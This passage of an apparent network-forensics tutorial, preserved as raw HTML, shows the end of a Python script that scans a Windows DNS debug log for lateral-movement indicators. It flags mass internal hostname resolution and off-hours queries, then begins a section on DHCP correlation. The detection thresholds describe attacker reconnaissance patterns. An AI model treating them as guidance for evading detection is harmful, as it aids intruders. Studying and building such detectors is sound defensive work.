style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.lan'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">internal_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">10</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        
</span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sliding 10-minute window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> i</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> _</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">enumerate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">internal_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                host </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> internal_queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> start_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">600</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 10 min window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            
unique_hosts_in_window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">window</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> unique_hosts_in_window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MASS_INTERNAL_RESOLUTION'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">unique_hosts_in_window</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique internal hostnames in 10-minute window starting </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">start_ts</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" 
style=\"color:hsl(139, 66%, 32%)\">'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Detect unusual timing: queries at off-hours (midnight - 5am)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        off_hours_queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> qt </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> query_list</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hour </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span 
class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">off_hours_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">20</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">'OFF_HOURS_ACTIVITY'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">off_hours_queries</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> queries between midnight and 5AM'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MEDIUM'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> findings</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    log_file </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> sys</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">argv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" 
style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">sys</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">argv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'C:\\DNSDebugLog\\dns.log'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Parsing DNS debug log: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">log_file</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parse_dns_debug_log</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Found </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">queries</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique client IPs\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    findings </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 
35%)\">=</span><span class=\"token plain\"> detect_lateral_movement_patterns</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[+] No lateral movement indicators detected\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" 
style=\"color:hsl(139, 66%, 32%)\">f\"\\n[!] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">findings</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> INDICATORS DETECTED:\\n\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> f </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 
66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  [</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 
13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"         </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation 
string\" style=\"color:hsl(139, 66%, 32%)\">\\n\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--dhcp-log-forensics-the-ip-identity-backbone\">Part 3  DHCP Log Forensics: The IP Identity Backbone<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-3--dhcp-log-forensics-the-ip-identity-backbone\" class=\"hash-link\" aria-label=\"Direct link to Part 3  DHCP Log Forensics: The IP Identity Backbone\" title=\"Direct link to Part 3  DHCP Log Forensics: The IP Identity Backbone\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-why-dhcp-logs-are-essential-for-network-ir\">3.1 Why DHCP Logs Are Essential for Network IR<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#31-why-dhcp-logs-are-essential-for-network-ir\" class=\"hash-link\" aria-label=\"Direct link to 3.1 Why DHCP Logs Are Essential for Network IR\" title=\"Direct link to 3.1 Why DHCP Logs Are Essential for Network IR\" translate=\"no\">​</a></h3>\n<p>In any active investigation, you will frequently encounter IP addresses in NetFlow, DNS query logs, and authentication logs with no hostname context. Without DHCP correlation, <code>10.10.5.42</code> is meaningless. 
